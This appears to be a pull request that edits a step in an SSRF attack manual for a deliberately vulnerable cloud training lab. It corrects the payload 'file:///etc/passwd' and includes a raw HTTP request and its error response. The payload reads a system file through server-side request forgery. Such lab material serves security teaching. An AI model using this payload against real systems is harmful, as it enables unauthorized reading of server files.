### PR TITLE
fix "01-Server Side Request Forgery.md"

### DIFF
--- a/attack-manuals/module-1/01-Server Side Request Forgery.md
+++ b/attack-manuals/module-1/01-Server Side Request Forgery.md
@@ -21,7 +21,7 @@ In the "Enter URL of image" field, write down the below-mentioned payload.
 Payload:
 
 ```
-file:///etc/passwd/
+file:///etc/passwd
 ```
 
 **Step 3:** First, right-click on the screen and you will find inspect elements, click on that and open the "Network" tab. After that, click on the "Upload" button.


### PR DESCRIPTION

An error occurred when I entered "`file:///etc/passwd/`".

```
GET /backend-function/save-content?value=file:///etc/passwd/ HTTP/1.1
Host: us-west1-gcp-goat-XXXXX.cloudfunctions.net
(...snip...)


HTTP/1.1 500 Internal Server Error
(...snip...)

500 Internal Server Error: The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
```
